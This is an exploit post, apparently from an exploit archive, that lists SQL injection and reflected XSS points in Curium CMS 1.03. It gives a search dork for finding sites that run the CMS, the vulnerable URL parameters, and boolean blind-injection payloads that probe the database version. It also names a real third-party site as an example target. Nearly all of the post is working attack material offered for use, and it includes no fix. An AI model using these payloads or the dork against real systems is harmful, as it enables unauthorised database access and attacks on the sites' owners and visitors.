facebook facebook twitter rss

Curium CMS 1.03 Sql Injection/XSS Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 20-06-2012

#######################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Script : http://www.dbmasters.net/
.:. Dork : "Powered by dB Masters' Curium CMS 1.03"
#######################################################################

===[ Exploit ]===


Multiple Sql Injection
=======================
http://SITE/index.php?id=Sql Injection
http://SITE/news.php?id=Sql Injection
http://SITE/referme.php?id=Sql Injection
http://SITE/links.php?id=Sql Injection
http://SITE/forum.php?id=Sql Injection
http://SITE/calendar.php?id=Sql Injection

To Bypass Filter Used Command Blind Injection

http://SITE/index.php?id=100+and+1=1 True
http://SITE/index.php?id=100+and+1=2 False

http://SITE/index.php?id=100+and+substring(@@version,1,1)=5 True
http://SITE/index.php?id=100+and+substring(@@version,1,1)=4 False

Example:
http://www.unitedracking.com/cms/index.php?id=13


Reflected XSS
==============


http://SITE/calendar.php?id=XSS Code
http://SITE/referme.php?id=XSS Code
http://SITE/forum.php?id=XSS Code
http://SITE/guestbook.php?ax=a&id=XSS Code
http://SITE/profile.php?ref=XSS Code


#######################################################################

Like us on Facebook :